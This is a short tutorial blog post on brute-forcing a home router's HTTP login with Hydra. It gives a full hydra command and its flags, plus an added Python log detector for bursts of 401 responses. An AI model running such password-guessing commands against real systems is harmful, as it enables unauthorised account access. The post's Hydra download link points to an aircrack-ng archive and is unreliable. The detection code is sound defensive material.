Cracking HTTP Passwords (Hydra)

A basic guide on how to use Hydra to crack an HTTP password on a 'home' router.

Links

Download video: http://download.g0tmi1k.com/videos_archive/Hydra.mp4

Method

  • Uses a dictionary attack to test for weak or simple passwords on one or more remote clients

Tools

  • Hydra
  • Big dictionary

Software

Name: Hydra

Version: 5.4

Home Page: http://freeworld.thc.org/

Download Link: hxxp://download.aircrack-ng.org/aircrack-ng-1.0-rc3.tar.gz

Commands

hydra -l admin -P /pentest/passwords/wordlists/g0tmi1k.lst -e ns -t 15 -f -S -vV 192.168.1.1 http-get /

-l = username
-P = password list (reads passwords from a wordlist file)
-e ns = extra checks: 'n' tries a null (empty) password, 's' tries the username as the password
-t xx = how many tasks to run at once
-f = exit once it finds the first user/password pair
-S = connect via SSL (capital S; lowercase -s takes a port number instead)
-vV = verbose mode (shows more info)
192.168.1.1 = IP address
http-get = what to crack/method etc
/ = page to crack (root)
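
Seen from the router or web server side, the run above appears as a burst of HTTP 401 responses to a single client, since each wrong guess is rejected and -t runs many guesses at once. The following detector is an added example, not part of the original post; the Common Log Format input, the sample lines, the 10-second window and the threshold of 5 are all assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample log (Common Log Format); addresses and times are made up.
SAMPLE_LOG = """\
192.168.1.20 - admin [12/Jul/2009:21:13:40 +0000] "GET / HTTP/1.1" 401 0
192.168.1.20 - admin [12/Jul/2009:21:13:52 +0000] "GET / HTTP/1.1" 200 5120
192.168.1.50 - admin [12/Jul/2009:21:14:01 +0000] "GET / HTTP/1.0" 401 0
192.168.1.50 - admin [12/Jul/2009:21:14:01 +0000] "GET / HTTP/1.0" 401 0
192.168.1.50 - admin [12/Jul/2009:21:14:01 +0000] "GET / HTTP/1.0" 401 0
192.168.1.50 - admin [12/Jul/2009:21:14:02 +0000] "GET / HTTP/1.0" 401 0
192.168.1.50 - admin [12/Jul/2009:21:14:02 +0000] "GET / HTTP/1.0" 401 0
this line is malformed and must be skipped
192.168.1.50 - admin [12/Jul/2009:21:14:03 +0000] "GET / HTTP/1.0" 401 0
192.168.1.50 - admin [12/Jul/2009:21:14:03 +0000] "GET / HTTP/1.0" 200 5120
"""

LINE_RE = re.compile(r'(\S+) \S+ \S+ \[([^\]]+)\] "[^"]*" (\d{3}) \S+')

def detect_bruteforce(log_text, window=timedelta(seconds=10), threshold=5):
    """Flag clients that receive >= threshold 401 responses within `window`.

    Returns {ip: {"peak": most 401s seen in one window,
                  "success_after": True if a 200 followed the burst}}.
    """
    recent = defaultdict(list)          # ip -> timestamps of 401s still in window
    findings = {}
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue                    # ignore lines that are not CLF
        ip, status = m.group(1), int(m.group(3))
        ts = datetime.strptime(m.group(2), "%d/%b/%Y:%H:%M:%S %z")
        if status == 401:
            recent[ip] = [t for t in recent[ip] if ts - t <= window] + [ts]
            if len(recent[ip]) >= threshold:
                entry = findings.setdefault(ip, {"peak": 0, "success_after": False})
                entry["peak"] = max(entry["peak"], len(recent[ip]))
        elif status == 200 and ip in findings:
            findings[ip]["success_after"] = True   # a guess probably succeeded
    return findings

if __name__ == "__main__":
    for ip, info in detect_bruteforce(SAMPLE_LOG).items():
        print(ip, info)
```

A single mistyped password followed by a successful login (192.168.1.20 in the sample) stays below the threshold and is not flagged.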

Notes

  • This is cut from my final video called "g0tmi1k's home network".
  • The password HAS to be in the dictionary - so if you use something like http://grc.com/pass, the chances of it being cracked are next to nothing!

Song: Rage Against The Machine - Killing in the Name of (Mr. Oizo Remix)

Video length: 01:21

Capture length: 01:40

Blog Post: https://blog.g0tmi1k.com/2009/07/cracking-http-passwords-hydra/